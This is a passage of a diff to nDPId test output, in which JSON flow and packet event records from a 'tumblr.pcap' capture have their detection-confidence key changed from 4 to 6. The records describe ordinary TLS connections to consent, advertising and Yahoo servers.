-00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105274,"flow_last_seen":1605292105299,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105299,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605292105274,"flow_last_seen":1605292105340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1605292105340,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":378,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105274,"flow_last_seen":1605292105299,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105299,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":397,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1605292105274,"flow_last_seen":1605292105340,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":616,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1605292105340,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:135:155a:23ba:b2a:25ff:122d","src_port":58382,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"consent.cmp.oath.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105418,"flow_last_seen":1605292105418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105418,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1605292105418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105418,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3sAAAAAoAL9IOHqAAACBAWgBAIIChNm5EYAAAAAAQMDBw=="} 00613{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105433,"flow_last_seen":1605292105433,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292105433,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1605292105433,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105433,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACgGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5MAAAAAoAL9IMKvAAACBAWgBAIICr4D0hAAAAAAAQMDBw=="} 
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1605292105447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105447,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY8Go+Ou0O5ht8oBJXgIDEAAACBAV4AQMDAwQCCArC3Z7YE2bkRg=="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":435,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1605292105447,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105447,"pkt":"qtsDr8lk5EKm5WPyht1gDBurACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPABuw7mG3xqPjrugBAB+wS5AAABAQgKE2bkY8Ldntg="} -00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105418,"flow_last_seen":1605292105448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292105448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00949{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":436,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105418,"flow_last_seen":1605292105448,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292105448,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1605292105459,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292105459,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSABSZgAFAgAAAAAAAAAEAEqAcsBIEmLB5kd7IUo3\/YpAbu4DgNW0a1gJBeUoBJXgDGmAAACBAV4AQMDAwQCCArC3Z7jvgPSEA=="} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":438,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1605292105459,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105459,"pkt":"qtsDr8lk5EKm5WPyht1gCUBCACAGQCoBywEgSYsHmR3shSjf9ikgAUmYABQIAAAAAAAAABABuA4Bu2AkF5QDVtGugBAB+7WdAAABAQgKvgPSKsLdnuM="} 
-00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105433,"flow_last_seen":1605292105459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105459,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":442,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105418,"flow_last_seen":1605292105494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292105494,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292105433,"flow_last_seen":1605292105459,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292105459,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":442,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105418,"flow_last_seen":1605292105494,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292105494,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39152,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105669,"flow_last_seen":1605292105669,"flow_idle_time":7580000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1605292105669,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1605292105669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":206,"pkt_l4_len":152,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAJgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOk4W2C\/9gBhA0URlAAABAQgKBcmbq8LdLRcXAwMAcysuUqnNdP5CtlTC2pWvfZyUMV8UFocs8M6W09NnsspPibPhqobMFIm1f0B4kk13U59rzTyXjGQM3JpbSJkQg4GGmBSNMo7KgMloXnt3GygjcT75OOC0YPo3\/MFdKUwkpDu47ubalsF7IwgRDAn\/l0DFoLo="} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105669,"flow_last_seen":1605292105669,"flow_idle_time":7580000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1605292105669,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105669,"flow_last_seen":1605292105669,"flow_idle_time":7580000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":1,"thread_ts_msec":1605292105669,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00553{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1605292105669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOsYW2C\/9gBhA0ehRAAABAQgKBcmbrMLdLRcXAwMAIgQb59HIMHYAgoaCAJqbMMjq72ntBt\/\/eGErLyXH34Iczsk="} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1605292105669,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":215,"pkt_l4_len":161,"thread_ts_msec":1605292105669,"pkt":"qtsDr8lk5EKm5WPyht1gCP\/sAKEGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAE0D3doBu3fKOu0W2C\/9gBhA0aEtAAABAQgKBcmbrMLdLRcXAwMAfBkhBkIFqMuMKjD1\/xjqGp2hEKMP3ziLomYjJXbyDDBzMNKC8MmFqfqAj9+xvxfAO7rBldu4UpazYVXmg399TnFcypI7qckvMpQyy6kehQ5F75J5BlTYjgokme9I6h8+9mS8Y6D2WQEp5qh0Ix9\/vReZo1xT0xocl8k7wFQ="} 
-00675{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00675{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":485,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292105669,"flow_last_seen":1605292105720,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":11638,"flow_avg_l4_payload_len":363,"midstream":1,"thread_ts_msec":1605292105720,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4d03","src_port":56794,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105726,"flow_last_seen":1605292105726,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":1605292105726,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1605292105726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":213,"pkt_l4_len":159,"thread_ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAJ8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npntnZTJergBgB9damAAABAQgKLIniTsLdLfkXAwMAepLzP8oRHbXAD5D56fW\/ezxXNRxKdaqM6BwQpjw0zyORx06Rl8gHWinoWY19NxmIXl2owLgVHJ\/UEVkHmda\/PMinu6FgCqLeUi5RUsVJaGqL1ulKRH6Mi5nxYau2z9M9f+jUaBIVXH47AOoxy+jPs5YTh+8Es3OdfTIr"} -00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105726,"flow_last_seen":1605292105726,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":1605292105726,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00665{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292105726,"flow_last_seen":1605292105726,"flow_idle_time":7580000,"flow_min_l4_payload_len":127,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":127,"flow_avg_l4_payload_len":127,"midstream":1,"thread_ts_msec":1605292105726,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::c000:4c03","src_port":51874,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00549{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1605292105726,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":125,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":125,"pkt_l4_len":71,"thread_ts_msec":1605292105726,"pkt":"qtsDr8lk5EKm5WPyht1gBYNxAEcGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAADAAEwDyqIBu7npn1jZTJergBgB9c+fAAABAQgKLIniTsLdLfkXAwMAInb0OIEXDizCLxamWTiLwYinYzi396zhkwGnl1I5tNs4gXU="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":568,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1605292105774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292105774,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAMAATAMqAcsBIEmLB5kd7IUo3\/YpAbvKotlMl6u56Z9YgBALghHTAAABAQgKwt2gFiyJ4k4="} -00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":574,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105433,"flow_last_seen":1605292105774,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605292105774,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": 
{"version":"TLSv1.3","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00988{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":574,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292105433,"flow_last_seen":1605292105774,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605292105774,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"cookiex.ngd.yahoo.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 